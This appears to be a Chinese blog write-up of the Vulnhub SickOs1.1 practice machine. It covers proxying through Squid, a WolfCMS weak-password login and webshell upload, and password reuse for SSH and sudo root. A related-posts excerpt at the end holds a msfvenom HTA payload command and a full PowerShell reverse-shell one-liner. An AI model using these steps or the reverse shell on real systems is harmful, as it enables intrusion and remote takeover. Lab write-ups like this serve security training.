Vulnhub 靶机 SickOs1.1 write up 配置squid代理,wolfcms getshell sudo提权

已于 2022-02-11 11:42:10 修改
阅读量3.9k 收藏 2
点赞数 1
分类专栏: 靶机学习 文章标签: 安全 linux web安全
于 2022-01-03 23:46:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/YouthBelief/article/details/122294150
版权

0x00 环境准备

  • 下载链接

     https://download.vulnhub.com/sickos/sick0s1.1.7z

  • 运行环境
    Vmware

  • 目标
    root + flag

0x01 信息收集

  • 靶机IP探测
    nmap -sP 192.168.157.0/24
  • 端口服务探测
    nmap -sC -sV -A -p- 192.168.157.169 -o port.txt

在这里插入图片描述
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9

0x02 漏洞挖掘

思路一:web探测

利用3128的squid代理 设置浏览器代理访问 web挖掘漏洞

步骤一:浏览器开启 squid的3128端口代理

在这里插入图片描述

步骤二:访问80+目录扫描

(1)
http://192.168.157.169/
在这里插入图片描述
(2)dirsearch 目录扫描

python3 dirsearch.py  -u "http://192.168.157.169/" -e "*" --proxy 192.168.157.169:3128

在这里插入图片描述

或者 nikto

nikto -h 192.168.157.169 -useproxy http://192.168.157.169:3128

在这里插入图片描述

(3)
http://192.168.157.169/robots.txt

在这里插入图片描述

步骤三:wolfcms 漏洞利用

(1)搜索已知漏洞利用 需要登录后台
后台目录在 http://192.168.157.169/wolfcms/?/admin/login
在这里插入图片描述
(2)弱口令 admin admin 进入成功
(3)寻找到 一个文件上传漏洞
漏洞利用 url
/wolfcms/?/admin/plugin/file_manager
在这里插入图片描述
在这里插入图片描述
上传成功 访问 上传后的地址
http://192.168.157.169/wolfcms/public/webshell.php

步骤四:蚁剑连接

(1)配置http代理
在这里插入图片描述
(2)连接小马
在这里插入图片描述
连接成功
在这里插入图片描述

步骤五:信息收集

(1)发现数据库连接文件
在这里插入图片描述
搜集到 一个密码 john@123
可以后续用于登录 ssh等尝试

(2)
id在这里插入图片描述
cat /etc/passwd
在这里插入图片描述
sickos 账号

步骤六:ssh登录root和 sickos 尝试

(1)root john@123 失败
(2)sickos john@123 成功

在这里插入图片描述

0x03 提权

步骤七:sudo 尝试

sudo 提权 密码 john@123

在这里插入图片描述

0x04 总结

该靶机 比较简单 通过靶机squid服务配置的代理 访问到80的web服务,通过robots.txt 获取到 存在 wolfcms,利用该cms的文件上传漏洞 getshell 。之后 在网站数据库配置文件中翻到 数据库密码,用该密码尝试登录 linux 账号成功。

Vulnhub靶机系列:SickOs: 1.1
汗的博客
04-19 1253
这次的靶机Vulnhub靶机靶机地址及相关描述 靶机设置 利用知识及工具 信息收集并getshell 总结
Vulnhub系列-sick0s1.1
Yasso的博客
01-01 3552
靶机192.168.12.130 kali: 192.168.249.128 一、信息收集 nmap -sV 192.168.12.130 –扫描开放端口 3128端口是作为代理 dirsearch -u http://192.168.12.130 --proxy=192.168.12.130:3128 –扫下web目录 扫到robots.txt Wolf CMS 后台管理:?/admin 一试就出来了–弱口令:admin/admin Wolfcms 0.8.2中存在任意文件上传漏洞 weevely是适用
vulhub——SickOs: 1.1
战神/calmness的博客
06-04 579
下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z 目标机器地址:192.168.243.137 攻击机器地址:192.168.18.148 目录 信息收集 扫描 设置代理 wolfcms 上传木马 并且 访问 SSH登录 sudo 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubunt..
VulnHub-sick0s1.1-靶机渗透学习
嗯嗯呐的博客
12-06 805
靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ 靶机难度:中级(CTF) 靶机描述:这个CTF明确地比喻了如何在网络上执行黑客策略,以在安全的环境中危害网络。 这个虚拟机与我在OSCP中遇到的实验室非常相似。 目的是破坏网络/计算机并在其上获得管理/根目录特。 目标:得到root限&找到flag.txt 作者:嗯嗯呐 目录信息收集getshell利用shellshock获得shell总结 信息收集 Nmap 扫描靶机端口 nmap扫描靶机
SickOs1.1--靶机实操详解
qq_61802750的博客
08-05 484
所以我们要去找到它的管理员路径。这个系统没有做多少的自定义的功能,还是老旧的系统,我们可以通过:1.猜测;这样的话我们有理由去推测:整个系统就是administertor,所以我们能不能找到它的凭据,从而利用它的身份。这样我们就得到了一个root用户,但我们无法得出是22端口的ssh用户还是3128端口的用户。打开浏览器,对3128端口和8080端口进行访问,虽然说8080端口是关闭的,但我们还是要进行尝试。好了,我们看到了wolfcms的这么一个内容管理系统,那么在这个系统中,artcles中,有。
VulnHub-SickOs1.1
热门推荐
江左盟的博客
07-07 1万+
信息收集 使用 漏洞发现 漏洞利用
Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛
Zeu_s的博客
03-11 817
Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛
sickos 靶机渗透(wolf cms 渗透,squid 代理)
m0_63416413的博客
08-30 1331
主机发现阶段的tcp扫描开放了22, 3128, 8080, 但是8080关闭3128开放了squid服务,起代理作用用3128做代理,访问8080,看到web页面使用dirb -p 代理,爆破8080的目录发现8080的robots文件,找到/wolfcms目录是一个wolfcms的后台路径,/?搜索默认密码,admin admin观察,发现可执行php,反弹个shell拿到一个初级shell, 用户为www-data。
VulnHub靶机系列实战教程:涵盖Web漏洞利用与Linux技术
最新发布
05-11
教程中还特别强调了对靶机环境的理解和配置,例如网络设置、服务版本识别等,并供了多种方法,如SUID、计划任务、内核等。此外,作者还分享了在遇到难题时寻求帮助的经验,包括通过社交媒体联系...
渗透测试靶机----Sickos1.1
久恙502的博客
01-19 855
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
红队打靶:SickOS1.1详细打靶思路(vulnhub
Bossfrank的博客
06-07 2467
本文是vulnhub靶机sickos详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细供了渗透的思路和每一步的用意。本文使用了squid代理分析+wolfcms渗透的思路获取shell。下一篇文章将详述利用shellshock漏洞进行渗透的思路。
Vulhub sickos1.1
hee_mee的博客
05-06 368
NilZero
靶机渗透练习38-SickOs1
hirak0的博客
04-18 1037
靶机描述 靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ Description About Release Name........: SickOs1.1 Date Release: 11 Dec 2015 Author......: D4rk Series......: SickOs Objective...: Get /root/a0216ea4d51874464078c618298b1367.txt Tester(s)...: h1tch1 Tw
SickOs1.1靶场渗透】
一纸荒芜的博客
12-14 1218
SickOs1.1靶场渗透
vulnhub靶机渗透 sick0s1.1
RestoreJustice的博客
03-19 291
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。木马所在的public录入前面扫描时已经扫到,所以木马位置为http://192.168.110.132/wolfcms/试着访问http://192.168.110.132/,发现无法访问。查看开放的端口,发现3306开启,但是发现mysql版本大于5.1,无法udf。/test.php,使用蚁剑连接,记得挂上靶机的3128代理
Sickos1.1 详细靶机思路 实操笔记
observer的博客
11-23 1246
Sickos1.1 详细靶机思路 实操笔记
vulhub漏洞复现之bash(Shellshock CVE-2014-6271
weixin_43071873的博客
11-27 1455
Shellshock 破壳漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。 2.漏洞影响:GNU Bash <= 4.3
sick0s1.1靶场 渗透思路
qq_52732967的博客
07-01 305
开启我们的目录爆破(注意要设置代理)//gobuster我搜了半天没找着开代理的方法网上的这个不行,如果大家有知道的可以分享一下,让我学习学习。瞅着像目录啊,进去后发现是一个cms,搜索其admin默认路劲以及登录密码,成功进入后台。但是在页尾位置有一个squid/3.1.19,很显然是一个什么组件之类的。目标机器开启的三个端口中,ssh重最低,8080最高,3128不知道是啥玩意。后台有管理员的业务控制,插入我们的反弹shell(这块我环境坏了…只找到了dirb的,不过也是扫出来了。
OSCP - SickOS:1.1 writeup
Jiajiajiang_的博客
04-15 794
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover 地址为10.0.3.143 nmap nmap -sV -p- 10.0.3.143 漏扫 想了一下突破口肯定不是ssh,就从3128端口入手把...
windows靶机反弹shell及
02-19
### Windows 靶机反弹 Shell 和方法 #### 一、使用 Metasploit 实现反弹 Shell 为了创建一个可以用于反弹 Shell 的 payload 文件,可以通过 `msfvenom` 工具来完成。对于 Windows 系统而言,假设目标机器支持 x64 架构,则可采用如下命令生成 HTA 格式的 Payload: ```bash msfvenom -p windows/x64/shell_reverse_tcp LHOST=<vps_ip> LPORT=9090 -f hta-psh -o 1.hta ``` 此操作将会把生成的恶意文件保存为名为 "1.hta" 的文件[^3]。 当受害者访问这个 .hta 文件时,它会在受害者的计算机上执行并尝试连接到指定 IP 地址和端口上的监听器,从而建立反向 Shell 连接。 #### 二、通过 Netcat (nc) 创建简单 TCP 反弹 Shell 另一种较为基础的方式是在攻击者控制下的设备上启动监听服务,并让目标主机发送回连接请求。具体做法如下所示: - 攻击方设置好监听状态:`nc -lvp 4444` - 被控端执行相应指令以发起连接:`powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.41.142',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"` 上述 PowerShell 命令能够供更稳定的交互环境给攻击者[^2]。 #### 三、关于过程中的注意事项 一旦获得了初始级别的 Shell 访问限之后,下一步通常是试图升至更高层次的操作系统特级别。然而,在实际操作中需要注意以下几个方面的问题: - **网络配置**:确认攻击机与靶机处于相同网段内; - **架构匹配度**:确保所使用的 exploit 或 payload 符合目标系统的 CPU 类型(即 32-bit vs 64-bit),这可通过运行 `systeminfo` 来获取信息; - **持续性维护会话**:在整个渗透测试期间维持稳定的目标系统在线状况; - **漏洞适用范围**:考虑到某些安全更新可能已经修复了特定类型的弱点,因此应当针对未修补版本实施攻击策略; 最后一步是验证是否成功升了限等级,通常情况下可以借助于调用 `whoami` 或类似的内置工具来进行检查。如果显示的结果表明当前是以管理员身份登录的话,则说明操作顺利完成[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值